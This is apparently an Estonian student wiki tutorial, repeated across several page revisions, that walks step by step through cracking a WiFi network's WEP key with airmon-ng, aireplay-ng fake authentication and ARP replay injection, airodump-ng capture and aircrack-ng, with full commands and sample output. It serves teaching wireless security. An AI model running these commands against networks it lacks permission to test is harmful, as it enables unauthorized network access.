<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode

]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:42:35Z

Ktragel: /* Näide WEP võtme lahti murdmise protsessist */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:41:37Z

Ktragel: /* Lühikesed tegevussammud */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
